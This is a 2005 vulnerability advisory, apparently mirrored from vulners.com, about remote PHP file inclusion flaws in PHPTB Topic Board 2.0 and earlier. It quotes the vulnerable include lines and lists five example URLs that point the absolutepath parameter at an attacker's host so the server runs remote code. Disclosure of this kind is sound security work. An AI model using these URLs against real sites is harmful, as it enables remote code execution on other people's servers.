PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities

2005-08-1800:00:00

vulners.com

– == – == – == – == – == – == – == – == – == –
Name: PHPTB Topic Board - Multiple PHP injection
vulnerabilities
Version <= 2.0
Homepage: htt://www.phptb.com/

Author: Filip Groszyсski (VXSfx)
Date: 17 August 2005
– == – == – == – == – == – == – == – == – == –

Background:

 PHPTB Topic Borad is an open source portal system. 
 However, an input validation flaw can cause malicious
 attackers to remote code execution on the web server.

Vulnerable code exist in ./classes/admin_o.php,
./classes/board_o.php,
./classes/dev_o.php,
./classes/file_o.php and
./classes/tech_o.php:
<?php
include $absolutepath.'classes/smart_o.php';
… EOF

Over that I found vulnerable code in ./classes/dev_o.php and
./classes/tech_o.php:

…
require $GLOBALS['absolutepath'].'userpass.php';
… EOF

Examples:

   http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
   http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
   http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
   http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
   http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

Contact:

   Author: Filip Groszynski &#40;VXSfx&#41;
   Location: Poland &lt;Warsaw&gt;
   Email: groszynskif gmail com

– == – == – == – == – == – == – == – == – == –

JSON

PHPTB Topic Board &lt;= 20: Multiple PHP injection vulnerabilities

PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities